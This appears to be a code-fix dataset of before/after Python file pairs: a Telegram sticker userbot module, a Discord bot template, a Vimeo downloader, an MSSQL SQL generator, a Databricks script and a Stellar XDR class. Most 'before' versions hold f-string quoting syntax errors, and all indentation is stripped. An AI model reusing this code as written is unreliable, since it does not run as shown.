await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"Sticker added in a Different Pack !\
\nThis Pack is Newly created!\
\nYour pack can be found [here](t.me/addstickers/{packname}) and emoji of the sticker added is {emoji}",
parse_mode='md')
return
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp.text}")
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message('/done')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
else:
await args.edit("`Brewing a new Pack...`")
async with bot.conversation('Stickers') as conv:
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp}")
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"Sticker kanged successfully!\
\nPack can be found [here](t.me/addstickers/{packname}) and emoji of the sticker is {emoji}",
parse_mode='md')
async def resize_photo(photo):
""" Resize the given photo to 512x512 """
image = Image.open(photo)
maxsize = (512, 512)
if (image.width and image.height) < 512:
size1 = image.width
size2 = image.height
if image.width > image.height:
scale = 512 / size1
size1new = 512
size2new = size2 * scale
else:
scale = 512 / size2
size1new = size1 * scale
size2new = 512
size1new = math.floor(size1new)
size2new = math.floor(size2new)
sizenew = (size1new, size2new)
image = image.resize(sizenew)
else:
image.thumbnail(maxsize)
return image
def char_is_emoji(character):
return character in emoji.UNICODE_EMOJI
@borg.on(admin_cmd(pattern="stkrinfo$"))
async def get_pack_info(event):
if not event.is_reply:
await event.edit("`I can't fetch info from nothing, can I ?!`")
return
rep_msg = await event.get_reply_message()
if not rep_msg.document:
await event.edit("`Reply to a sticker to get the pack details`")
return
try:
stickerset_attr = rep_msg.document.attributes[1]
await event.edit(
"`Fetching details of the sticker pack, please wait..`")
except BaseException:
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
if not isinstance(stickerset_attr, DocumentAttributeSticker):
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
get_stickerset = await bot(
GetStickerSetRequest(
InputStickerSetID(
id=stickerset_attr.stickerset.id,
access_hash=stickerset_attr.stickerset.access_hash)))
pack_emojis = []
for document_sticker in get_stickerset.packs:
if document_sticker.emoticon not in pack_emojis:
pack_emojis.append(document_sticker.emoticon)
OUTPUT = f"**Sticker Title:** `{get_stickerset.set.title}\n`" \
f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" \
f"**Official:** `{get_stickerset.set.official}`\n" \
f"**Archived:** `{get_stickerset.set.archived}`\n" \
f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" \
f"**Emojis In Pack:**\n{' '.join(pack_emojis)}"
await event.edit(OUTPUT)
CMD_HELP.update({
"stickers":
".kang\
\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack.\
\n\n.kang [emoji('s)]\
\nUsage: Works just like .kang but uses the emoji('s) you picked.\
\n\n.kang [number]\
\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji.\
\n\n.kang [emoji('s)] [number]\
\nUsage: Kang's the sticker/image to the specified pack and uses the emoji('s) you picked.\
\n\n.stkrinfo\
\nUsage: Gets info about the sticker pack."
})
|
from __future__ import annotations
import datetime
import os
from typing import Type
import asyncpg
import discord
from discord.ext import commands
from ..utils import Config
__all__ = ("TemplateBot",)
class TemplateBot(commands.AutoShardedBot):
"""
A template bot, comes with dynamic prefixes
Attributes:
startup (datetime): The datetime instance of when the bot was started
config: (Config): The config handler for the bot
prefix_cache (dict): The prefix cache, used to stop unnecessary queries
"""
def __init__(self, *args, **kwargs):
self.startup: datetime.datetime = datetime.datetime.utcnow()
self.config = Config.from_file("config.ini")
self.prefix_cache = {}
super().__init__(
self.get_prefix,
intents=discord.Intents.default(),
case_insensitive=True,
chunk_guilds_at_startup=False,
allowed_mentions=discord.AllowedMentions(everyone=False, roles=False),
*args,
**kwargs,
)
async def _create_database(self):
"""
Makes the connection to postgres
And creates the tables if they don't exist
"""
self.pool = await asyncpg.create_pool(
database=self.config["db"]["name"],
user=self.config["db"]["user"],
password=self.config["db"]["password"],
)
with open("schema.sql") as file:
await self.pool.execute(file.read())
async def get_prefix(self, message: discord.Message) -> str:
"""
This method returns the prefix that is connected to the guild.
Args:
message (discord.Message): The discord.Message instance
Returns:
str: The prefix
"""
try:
cached_prefix = self.prefix_cache.get(message.guild.id)
if not cached_prefix:
async with self.pool.acquire() as conn:
data = await conn.fetchrow(
"SELECT prefix FROM guilds WHERE id = $1", message.guild.id
)
self.prefix_cache[message.guild.id] = data[0]
return data[0]
else:
return cached_prefix
except TypeError:
return self.config["bot"]["prefix"]
def run(self):
"""
Runs the bot
Raises:
error: Raised if anything wrong happens during making a connection to postgres
"""
try:
self.loop.run_until_complete(self._create_database())
except Exception as error:
raise error
for cog in [
f"src.cogs.{cog.replace(".py", "")}"
for cog in os.listdir("src/cogs")
if cog != "__pycache__"
]:
self.load_extension(cog)
super().run(self.config["bot"]["token"])
def get_message(self, message_id: int) -> discord.Message:
"""
Used to get a discord.Message instance without fetching
Args:
message_id (int): The messages id
Returns:
discord.Message: The corresponding discord.Message instance
"""
return self._connection._get_message(message_id)
async def getch(self, user_id: int) -> discord.User:
"""
A helper method that first tries grabbing from cache, if that returns None it fetches
Args:
user_id (int): The users id
Returns:
discord.User: The corresponding discord.User instance
"""
user = self.get_user(user_id) or await self.fetch_user(user_id)
return user
@property
def avatar(self) -> discord.Asset:
"""
The bots avatar
Returns:
discord.Asset: The corresponding discord.Asset instance
"""
return self.user.avatar_url
@property
def uptime(self):
"""
The bots uptime
Returns:
int: The bots uptime in seconds
"""
return (datetime.datetime.utcnow() - self.startup).total_seconds()
| from __future__ import annotations
import datetime
import os
from typing import Type
import asyncpg
import discord
from discord.ext import commands
from ..utils import Config
__all__ = ("TemplateBot",)
class TemplateBot(commands.AutoShardedBot):
"""
A template bot, comes with dynamic prefixes
Attributes:
startup (datetime): The datetime instance of when the bot was started
config: (Config): The config handler for the bot
prefix_cache (dict): The prefix cache, used to stop unnecessary queries
"""
def __init__(self, *args, **kwargs):
self.startup: datetime.datetime = datetime.datetime.utcnow()
self.config = Config.from_file("config.ini")
self.prefix_cache = {}
super().__init__(
self.get_prefix,
intents=discord.Intents.default(),
case_insensitive=True,
chunk_guilds_at_startup=False,
allowed_mentions=discord.AllowedMentions(everyone=False, roles=False),
*args,
**kwargs,
)
async def _create_database(self):
"""
Makes the connection to postgres
And creates the tables if they don't exist
"""
self.pool = await asyncpg.create_pool(
database=self.config["db"]["name"],
user=self.config["db"]["user"],
password=self.config["db"]["password"],
)
with open("schema.sql") as file:
await self.pool.execute(file.read())
async def get_prefix(self, message: discord.Message) -> str:
"""
This method returns the prefix that is connected to the guild.
Args:
message (discord.Message): The discord.Message instance
Returns:
str: The prefix
"""
try:
cached_prefix = self.prefix_cache.get(message.guild.id)
if not cached_prefix:
async with self.pool.acquire() as conn:
data = await conn.fetchrow(
"SELECT prefix FROM guilds WHERE id = $1", message.guild.id
)
self.prefix_cache[message.guild.id] = data[0]
return data[0]
else:
return cached_prefix
except TypeError:
return self.config["bot"]["prefix"]
def run(self):
"""
Runs the bot
Raises:
error: Raised if anything wrong happens during making a connection to postgres
"""
try:
self.loop.run_until_complete(self._create_database())
except Exception as error:
raise error
for cog in [
f"src.cogs.{cog.replace('.py', '')}"
for cog in os.listdir("src/cogs")
if cog != "__pycache__"
]:
self.load_extension(cog)
super().run(self.config["bot"]["token"])
def get_message(self, message_id: int) -> discord.Message:
"""
Used to get a discord.Message instance without fetching
Args:
message_id (int): The messages id
Returns:
discord.Message: The corresponding discord.Message instance
"""
return self._connection._get_message(message_id)
async def getch(self, user_id: int) -> discord.User:
"""
A helper method that first tries grabbing from cache, if that returns None it fetches
Args:
user_id (int): The users id
Returns:
discord.User: The corresponding discord.User instance
"""
user = self.get_user(user_id) or await self.fetch_user(user_id)
return user
@property
def avatar(self) -> discord.Asset:
"""
The bots avatar
Returns:
discord.Asset: The corresponding discord.Asset instance
"""
return self.user.avatar_url
@property
def uptime(self):
"""
The bots uptime
Returns:
int: The bots uptime in seconds
"""
return (datetime.datetime.utcnow() - self.startup).total_seconds()
|
import json
import os
import re
import time
import urllib.request
class VimeoScraper:
'''
Scraping Vimeo videos
Args:
out_path: [Optional] str, Path to output directory. If unspecified, current directory will be used
'''
def __init__(self, out_path=None):
if out_path is not None:
assert os.path.isdir(out_path), "Invalid output directory"
self.out_path = out_path
def scrape(self, url, quality, proxies=None):
'''
Scraper function for Vimeo
Args:
url: URL of vimeo video to be scraped
quality: Output video resolution
proxies: dict, A dictionary containing proxy information
'''
video_id = url.split('/')[-1]
quality = quality
try:
req = urllib.request.Request(f'https://player.vimeo.com/video/{video_id}/config?default_to_hd=1')
req.add_header('User-Agent',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17')
if proxies:
handler = urllib.request.ProxyHandler(proxies)
opener = urllib.request.build_opener(handler)
urllib.request.install_opener(opener)
resp = urllib.request.urlopen(req)
json_contents = json.load(resp)
except Exception:
raise ValueError("Invalid video URL")
title = json_contents['video']['title']
file_dicts = json_contents['request']['files']['progressive']
available_res = [d['quality'] for d in file_dicts]
if quality in available_res:
for d in file_dicts:
if d['quality'] == quality:
print('-' * 75)
print("Starting download")
start_time = time.time()
title = re.sub(r'''[\W_]+''', '', title)
urllib.request.urlretrieve(d['url'],
f"{self.out_path}/{title}-{quality}.mp4" if self.out_path else f"{title}-{quality}.mp4")
print(f"Download completed in {time.time() - start_time}s")
print('-' * 75)
else:
raise ValueError(
f"{quality} is not available for this video. {",".join(available_res)} resolutions are available")
| import json
import os
import re
import time
import urllib.request
class VimeoScraper:
'''
Scraping Vimeo videos
Args:
out_path: [Optional] str, Path to output directory. If unspecified, current directory will be used
'''
def __init__(self, out_path=None):
if out_path is not None:
assert os.path.isdir(out_path), "Invalid output directory"
self.out_path = out_path
def scrape(self, url, quality, proxies=None):
'''
Scraper function for Vimeo
Args:
url: URL of vimeo video to be scraped
quality: Output video resolution
proxies: dict, A dictionary containing proxy information
'''
video_id = url.split('/')[-1]
quality = quality
try:
req = urllib.request.Request(f'https://player.vimeo.com/video/{video_id}/config?default_to_hd=1')
req.add_header('User-Agent',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17')
if proxies:
handler = urllib.request.ProxyHandler(proxies)
opener = urllib.request.build_opener(handler)
urllib.request.install_opener(opener)
resp = urllib.request.urlopen(req)
json_contents = json.load(resp)
except Exception:
raise ValueError("Invalid video URL")
title = json_contents['video']['title']
file_dicts = json_contents['request']['files']['progressive']
available_res = [d['quality'] for d in file_dicts]
if quality in available_res:
for d in file_dicts:
if d['quality'] == quality:
print('-' * 75)
print("Starting download")
start_time = time.time()
title = re.sub(r'''[\W_]+''', '', title)
urllib.request.urlretrieve(d['url'],
f"{self.out_path}/{title}-{quality}.mp4" if self.out_path else f"{title}-{quality}.mp4")
print(f"Download completed in {time.time() - start_time}s")
print('-' * 75)
else:
raise ValueError(
f"{quality} is not available for this video. {','.join(available_res)} resolutions are available")
|
from .Platform import Platform
from ..Table import Table
class MSSQLPlatform(Platform):
types_without_lengths = [
"integer",
"big_integer",
"tiny_integer",
"small_integer",
"medium_integer",
]
type_map = {
"string": "VARCHAR",
"char": "CHAR",
"integer": "INT",
"big_integer": "BIGINT",
"tiny_integer": "TINYINT",
"big_increments": "BIGINT IDENTITY",
"small_integer": "SMALLINT",
"medium_integer": "MEDIUMINT",
"increments": "INT IDENTITY",
"uuid": "CHAR",
"binary": "LONGBLOB",
"boolean": "BOOLEAN",
"decimal": "DECIMAL",
"double": "DOUBLE",
"enum": "VARCHAR",
"text": "TEXT",
"float": "FLOAT",
"geometry": "GEOMETRY",
"json": "JSON",
"jsonb": "LONGBLOB",
"inet": "VARCHAR",
"cidr": "VARCHAR",
"macaddr": "VARCHAR",
"long_text": "LONGTEXT",
"point": "POINT",
"time": "TIME",
"timestamp": "DATETIME",
"date": "DATE",
"year": "YEAR",
"datetime": "DATETIME",
"tiny_increments": "TINYINT IDENTITY",
"unsigned": "INT",
"unsigned_integer": "INT",
}
premapped_nulls = {True: "NULL", False: "NOT NULL"}
premapped_defaults = {
"current": " DEFAULT CURRENT_TIMESTAMP",
"now": " DEFAULT NOW()",
"null": " DEFAULT NULL",
}
def compile_create_sql(self, table):
sql = []
sql.append(
self.create_format().format(
table=self.wrap_table(table.name),
columns=", ".join(self.columnize(table.get_added_columns())).strip(),
constraints=", "
+ ", ".join(self.constraintize(table.get_added_constraints(), table))
if table.get_added_constraints()
else "",
foreign_keys=", "
+ ", ".join(
self.foreign_key_constraintize(table.name, table.added_foreign_keys)
)
if table.added_foreign_keys
else "",
)
)
if table.added_indexes:
for name, index in table.added_indexes.items():
sql.append(
"CREATE INDEX {name} ON {table}({column})".format(
name=index.name,
table=self.wrap_table(table.name),
column=",".join(index.column),
)
)
return sql
def compile_alter_sql(self, table):
sql = []
if table.added_columns:
sql.append(
self.alter_format().format(
table=self.wrap_table(table.name),
columns="ADD "
+ ", ".join(self.columnize(table.added_columns)).strip(),
)
)
if table.changed_columns:
sql.append(
self.alter_format().format(
table=self.wrap_table(table.name),
columns="ALTER COLUMN "
+ ", ".join(self.columnize(table.changed_columns)).strip(),
)
)
if table.renamed_columns:
for name, column in table.get_renamed_columns().items():
sql.append(
self.rename_column_string(table.name, name, column.name).strip()
)
if table.dropped_columns:
dropped_sql = []
for name in table.get_dropped_columns():
dropped_sql.append(self.drop_column_string().format(name=name).strip())
sql.append(
self.alter_format().format(
table=self.wrap_table(table.name),
columns="DROP COLUMN " + ", ".join(dropped_sql),
)
)
if table.added_foreign_keys:
for (
column,
foreign_key_constraint,
) in table.get_added_foreign_keys().items():
cascade = ""
if foreign_key_constraint.delete_action:
cascade += f" ON DELETE {self.foreign_key_actions.get(foreign_key_constraint.delete_action.lower())}"
if foreign_key_constraint.update_action:
cascade += f" ON UPDATE {self.foreign_key_actions.get(foreign_key_constraint.update_action.lower())}"
sql.append(
f"ALTER TABLE {self.wrap_table(table.name)} ADD "
+ self.get_foreign_key_constraint_string().format(
clean_column=column,
constraint_name=foreign_key_constraint.constraint_name,
column=self.wrap_table(column),
table=table.name,
foreign_table=foreign_key_constraint.foreign_table,
foreign_column=self.wrap_table(
foreign_key_constraint.foreign_column
),
cascade=cascade,
)
)
if table.dropped_foreign_keys:
constraints = table.dropped_foreign_keys
for constraint in constraints:
sql.append(
f"ALTER TABLE {self.wrap_table(table.name)} DROP CONSTRAINT {constraint}"
)
if table.added_indexes:
for name, index in table.added_indexes.items():
sql.append(
"CREATE INDEX {name} ON {table}({column})".format(
name=index.name,
table=self.wrap_table(table.name),
column=",".join(index.column),
)
)
if table.removed_indexes:
constraints = table.removed_indexes
for constraint in constraints:
sql.append(
f"DROP INDEX {self.wrap_table(table.name)}.{self.wrap_table(constraint)}"
)
if table.added_constraints:
for name, constraint in table.added_constraints.items():
if constraint.constraint_type == "unique":
sql.append(
f"ALTER TABLE {self.wrap_table(table.name)} ADD CONSTRAINT {constraint.name} UNIQUE({",".join(constraint.columns)})"
)
elif constraint.constraint_type == "fulltext":
pass
elif constraint.constraint_type == "primary_key":
sql.append(
f"ALTER TABLE {self.wrap_table(table.name)} ADD CONSTRAINT {constraint.name} PRIMARY KEY ({",".join(constraint.columns)})"
)
return sql
def add_column_string(self):
return "{name} {data_type}{length}"
def drop_column_string(self):
return "{name}"
def rename_column_string(self, table, old, new):
return f"EXEC sp_rename '{table}.{old}', '{new}', 'COLUMN'"
def columnize(self, columns):
sql = []
for name, column in columns.items():
if column.length:
length = self.create_column_length(column.column_type).format(
length=column.length
)
else:
length = ""
default = ""
if column.default in (0,):
default = f" DEFAULT {column.default}"
elif column.default in self.premapped_defaults.keys():
default = self.premapped_defaults.get(column.default)
elif column.default:
if isinstance(column.default, (str,)):
default = f" DEFAULT '{column.default}'"
else:
default = f" DEFAULT {column.default}"
else:
default = ""
constraint = ""
column_constraint = ""
if column.primary:
constraint = " PRIMARY KEY"
if column.column_type == "enum":
values = ", ".join(f"'{x}'" for x in column.values)
column_constraint = f" CHECK([{column.name}] IN ({values}))"
sql.append(
self.columnize_string()
.format(
name=column.name,
data_type=self.type_map.get(column.column_type, ""),
column_constraint=column_constraint,
length=length,
constraint=constraint,
nullable=self.premapped_nulls.get(column.is_null) or "",
default=default,
)
.strip()
)
return sql
def columnize_string(self):
return "[{name}] {data_type}{length} {nullable}{default}{column_constraint}{constraint}"
def constraintize(self, constraints, table):
sql = []
for name, constraint in constraints.items():
sql.append(
getattr(
self, f"get_{constraint.constraint_type}_constraint_string"
)().format(
columns=", ".join(constraint.columns),
name_columns="_".join(constraint.columns),
constraint_name=constraint.name,
table=table.name,
)
)
return sql
def get_table_string(self):
return "[{table}]"
def create_format(self):
return "CREATE TABLE {table} ({columns}{constraints}{foreign_keys})"
def alter_format(self):
return "ALTER TABLE {table} {columns}"
def get_foreign_key_constraint_string(self):
return "CONSTRAINT {constraint_name} FOREIGN KEY ({column}) REFERENCES {foreign_table}({foreign_column}){cascade}"
def get_primary_key_constraint_string(self):
return "CONSTRAINT {constraint_name} PRIMARY KEY ({columns})"
def get_unique_constraint_string(self):
return "CONSTRAINT {constraint_name} UNIQUE ({columns})"
def compile_table_exists(self, table, database):
return f"SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = '{table}'"
def compile_truncate(self, table, foreign_keys=False):
if not foreign_keys:
return f"TRUNCATE TABLE {self.wrap_table(table)}"
return [
f"ALTER TABLE {self.wrap_table(table)} NOCHECK CONSTRAINT ALL",
f"TRUNCATE TABLE {self.wrap_table(table)}",
f"ALTER TABLE {self.wrap_table(table)} WITH CHECK CHECK CONSTRAINT ALL",
]
def compile_rename_table(self, current_name, new_name):
return f"EXEC sp_rename {self.wrap_table(current_name)}, {self.wrap_table(new_name)}"
def compile_drop_table_if_exists(self, table):
return f"DROP TABLE IF EXISTS {self.wrap_table(table)}"
def compile_drop_table(self, table):
return f"DROP TABLE {self.wrap_table(table)}"
def compile_column_exists(self, table, column):
return f"SELECT 1 FROM sys.columns WHERE Name = N'{column}' AND Object_ID = Object_ID(N'{table}')"
def get_current_schema(self, connection, table_name):
return Table(table_name)
def enable_foreign_key_constraints(self):
"""MSSQL does not allow a global way to enable foreign key constraints"""
return ""
def disable_foreign_key_constraints(self):
"""MSSQL does not allow a global way to disable foreign key constraints"""
return ""
| from .Platform import Platform
from ..Table import Table
class MSSQLPlatform(Platform):
types_without_lengths = [
"integer",
"big_integer",
"tiny_integer",
"small_integer",
"medium_integer",
]
type_map = {
"string": "VARCHAR",
"char": "CHAR",
"integer": "INT",
"big_integer": "BIGINT",
"tiny_integer": "TINYINT",
"big_increments": "BIGINT IDENTITY",
"small_integer": "SMALLINT",
"medium_integer": "MEDIUMINT",
"increments": "INT IDENTITY",
"uuid": "CHAR",
"binary": "LONGBLOB",
"boolean": "BOOLEAN",
"decimal": "DECIMAL",
"double": "DOUBLE",
"enum": "VARCHAR",
"text": "TEXT",
"float": "FLOAT",
"geometry": "GEOMETRY",
"json": "JSON",
"jsonb": "LONGBLOB",
"inet": "VARCHAR",
"cidr": "VARCHAR",
"macaddr": "VARCHAR",
"long_text": "LONGTEXT",
"point": "POINT",
"time": "TIME",
"timestamp": "DATETIME",
"date": "DATE",
"year": "YEAR",
"datetime": "DATETIME",
"tiny_increments": "TINYINT IDENTITY",
"unsigned": "INT",
"unsigned_integer": "INT",
}
premapped_nulls = {True: "NULL", False: "NOT NULL"}
premapped_defaults = {
"current": " DEFAULT CURRENT_TIMESTAMP",
"now": " DEFAULT NOW()",
"null": " DEFAULT NULL",
}
def compile_create_sql(self, table):
sql = []
sql.append(
self.create_format().format(
table=self.wrap_table(table.name),
columns=", ".join(self.columnize(table.get_added_columns())).strip(),
constraints=", "
+ ", ".join(self.constraintize(table.get_added_constraints(), table))
if table.get_added_constraints()
else "",
foreign_keys=", "
+ ", ".join(
self.foreign_key_constraintize(table.name, table.added_foreign_keys)
)
if table.added_foreign_keys
else "",
)
)
if table.added_indexes:
for name, index in table.added_indexes.items():
sql.append(
"CREATE INDEX {name} ON {table}({column})".format(
name=index.name,
table=self.wrap_table(table.name),
column=",".join(index.column),
)
)
return sql
def compile_alter_sql(self, table):
sql = []
if table.added_columns:
sql.append(
self.alter_format().format(
table=self.wrap_table(table.name),
columns="ADD "
+ ", ".join(self.columnize(table.added_columns)).strip(),
)
)
if table.changed_columns:
sql.append(
self.alter_format().format(
table=self.wrap_table(table.name),
columns="ALTER COLUMN "
+ ", ".join(self.columnize(table.changed_columns)).strip(),
)
)
if table.renamed_columns:
for name, column in table.get_renamed_columns().items():
sql.append(
self.rename_column_string(table.name, name, column.name).strip()
)
if table.dropped_columns:
dropped_sql = []
for name in table.get_dropped_columns():
dropped_sql.append(self.drop_column_string().format(name=name).strip())
sql.append(
self.alter_format().format(
table=self.wrap_table(table.name),
columns="DROP COLUMN " + ", ".join(dropped_sql),
)
)
if table.added_foreign_keys:
for (
column,
foreign_key_constraint,
) in table.get_added_foreign_keys().items():
cascade = ""
if foreign_key_constraint.delete_action:
cascade += f" ON DELETE {self.foreign_key_actions.get(foreign_key_constraint.delete_action.lower())}"
if foreign_key_constraint.update_action:
cascade += f" ON UPDATE {self.foreign_key_actions.get(foreign_key_constraint.update_action.lower())}"
sql.append(
f"ALTER TABLE {self.wrap_table(table.name)} ADD "
+ self.get_foreign_key_constraint_string().format(
clean_column=column,
constraint_name=foreign_key_constraint.constraint_name,
column=self.wrap_table(column),
table=table.name,
foreign_table=foreign_key_constraint.foreign_table,
foreign_column=self.wrap_table(
foreign_key_constraint.foreign_column
),
cascade=cascade,
)
)
if table.dropped_foreign_keys:
constraints = table.dropped_foreign_keys
for constraint in constraints:
sql.append(
f"ALTER TABLE {self.wrap_table(table.name)} DROP CONSTRAINT {constraint}"
)
if table.added_indexes:
for name, index in table.added_indexes.items():
sql.append(
"CREATE INDEX {name} ON {table}({column})".format(
name=index.name,
table=self.wrap_table(table.name),
column=",".join(index.column),
)
)
if table.removed_indexes:
constraints = table.removed_indexes
for constraint in constraints:
sql.append(
f"DROP INDEX {self.wrap_table(table.name)}.{self.wrap_table(constraint)}"
)
if table.added_constraints:
for name, constraint in table.added_constraints.items():
if constraint.constraint_type == "unique":
sql.append(
f"ALTER TABLE {self.wrap_table(table.name)} ADD CONSTRAINT {constraint.name} UNIQUE({','.join(constraint.columns)})"
)
elif constraint.constraint_type == "fulltext":
pass
elif constraint.constraint_type == "primary_key":
sql.append(
f"ALTER TABLE {self.wrap_table(table.name)} ADD CONSTRAINT {constraint.name} PRIMARY KEY ({','.join(constraint.columns)})"
)
return sql
def add_column_string(self):
return "{name} {data_type}{length}"
def drop_column_string(self):
return "{name}"
def rename_column_string(self, table, old, new):
return f"EXEC sp_rename '{table}.{old}', '{new}', 'COLUMN'"
def columnize(self, columns):
sql = []
for name, column in columns.items():
if column.length:
length = self.create_column_length(column.column_type).format(
length=column.length
)
else:
length = ""
default = ""
if column.default in (0,):
default = f" DEFAULT {column.default}"
elif column.default in self.premapped_defaults.keys():
default = self.premapped_defaults.get(column.default)
elif column.default:
if isinstance(column.default, (str,)):
default = f" DEFAULT '{column.default}'"
else:
default = f" DEFAULT {column.default}"
else:
default = ""
constraint = ""
column_constraint = ""
if column.primary:
constraint = " PRIMARY KEY"
if column.column_type == "enum":
values = ", ".join(f"'{x}'" for x in column.values)
column_constraint = f" CHECK([{column.name}] IN ({values}))"
sql.append(
self.columnize_string()
.format(
name=column.name,
data_type=self.type_map.get(column.column_type, ""),
column_constraint=column_constraint,
length=length,
constraint=constraint,
nullable=self.premapped_nulls.get(column.is_null) or "",
default=default,
)
.strip()
)
return sql
def columnize_string(self):
return "[{name}] {data_type}{length} {nullable}{default}{column_constraint}{constraint}"
def constraintize(self, constraints, table):
sql = []
for name, constraint in constraints.items():
sql.append(
getattr(
self, f"get_{constraint.constraint_type}_constraint_string"
)().format(
columns=", ".join(constraint.columns),
name_columns="_".join(constraint.columns),
constraint_name=constraint.name,
table=table.name,
)
)
return sql
def get_table_string(self):
return "[{table}]"
def create_format(self):
return "CREATE TABLE {table} ({columns}{constraints}{foreign_keys})"
def alter_format(self):
return "ALTER TABLE {table} {columns}"
def get_foreign_key_constraint_string(self):
return "CONSTRAINT {constraint_name} FOREIGN KEY ({column}) REFERENCES {foreign_table}({foreign_column}){cascade}"
def get_primary_key_constraint_string(self):
return "CONSTRAINT {constraint_name} PRIMARY KEY ({columns})"
def get_unique_constraint_string(self):
return "CONSTRAINT {constraint_name} UNIQUE ({columns})"
def compile_table_exists(self, table, database):
return f"SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = '{table}'"
def compile_truncate(self, table, foreign_keys=False):
if not foreign_keys:
return f"TRUNCATE TABLE {self.wrap_table(table)}"
return [
f"ALTER TABLE {self.wrap_table(table)} NOCHECK CONSTRAINT ALL",
f"TRUNCATE TABLE {self.wrap_table(table)}",
f"ALTER TABLE {self.wrap_table(table)} WITH CHECK CHECK CONSTRAINT ALL",
]
def compile_rename_table(self, current_name, new_name):
return f"EXEC sp_rename {self.wrap_table(current_name)}, {self.wrap_table(new_name)}"
def compile_drop_table_if_exists(self, table):
return f"DROP TABLE IF EXISTS {self.wrap_table(table)}"
def compile_drop_table(self, table):
return f"DROP TABLE {self.wrap_table(table)}"
def compile_column_exists(self, table, column):
return f"SELECT 1 FROM sys.columns WHERE Name = N'{column}' AND Object_ID = Object_ID(N'{table}')"
def get_current_schema(self, connection, table_name):
return Table(table_name)
def enable_foreign_key_constraints(self):
"""MSSQL does not allow a global way to enable foreign key constraints"""
return ""
def disable_foreign_key_constraints(self):
"""MSSQL does not allow a global way to disable foreign key constraints"""
return ""
|
import json
import requests
# curl -X GET -H "Authorization: Bearer [token]" https://[databricks url]/api/2.0/clusters/list
with open('config.json') as f:
config = json.load(f)
secrets = config["secrets"]["databricks"]
cluster_name = config["configuration"]["cluster_name"]
response = requests.post(
f"{secrets["url"]}/api/2.0/clusters/create",
headers={"Authorization": f"Bearer {secrets["token"]}"},
json={
"cluster_name": cluster_name,
"spark_version": "7.3.x-scala2.12",
"node_type_id": "Standard_D3_v2",
"autoscale": {
"min_workers": 2,
"max_workers": 8
}
}
)
if response.status_code == 200:
print(response.json())
else:
print("Error launching cluster: %s: %s" % (response.json()["error_code"], response.json()["message"]))
| import json
import requests
# curl -X GET -H "Authorization: Bearer [token]" https://[databricks url]/api/2.0/clusters/list
with open('config.json') as f:
config = json.load(f)
secrets = config["secrets"]["databricks"]
cluster_name = config["configuration"]["cluster_name"]
response = requests.post(
f"{secrets['url']}/api/2.0/clusters/create",
headers={"Authorization": f"Bearer {secrets['token']}"},
json={
"cluster_name": cluster_name,
"spark_version": "7.3.x-scala2.12",
"node_type_id": "Standard_D3_v2",
"autoscale": {
"min_workers": 2,
"max_workers": 8
}
}
)
if response.status_code == 200:
print(response.json())
else:
print("Error launching cluster: %s: %s" % (response.json()["error_code"], response.json()["message"]))
|
# This is an automatically generated file.
# DO NOT EDIT or your changes may be overwritten
import base64
from xdrlib import Packer, Unpacker
from .asset import Asset
from .int64 import Int64
from .muxed_account import MuxedAccount
__all__ = ["PaymentOp"]
class PaymentOp:
"""
XDR Source Code
----------------------------------------------------------------
struct PaymentOp
{
MuxedAccount destination; // recipient of the payment
Asset asset; // what they end up with
int64 amount; // amount they end up with
};
----------------------------------------------------------------
"""
def __init__(
self,
destination: MuxedAccount,
asset: Asset,
amount: Int64,
) -> None:
self.destination = destination
self.asset = asset
self.amount = amount
def pack(self, packer: Packer) -> None:
self.destination.pack(packer)
self.asset.pack(packer)
self.amount.pack(packer)
@classmethod
def unpack(cls, unpacker: Unpacker) -> "PaymentOp":
destination = MuxedAccount.unpack(unpacker)
asset = Asset.unpack(unpacker)
amount = Int64.unpack(unpacker)
return cls(
destination=destination,
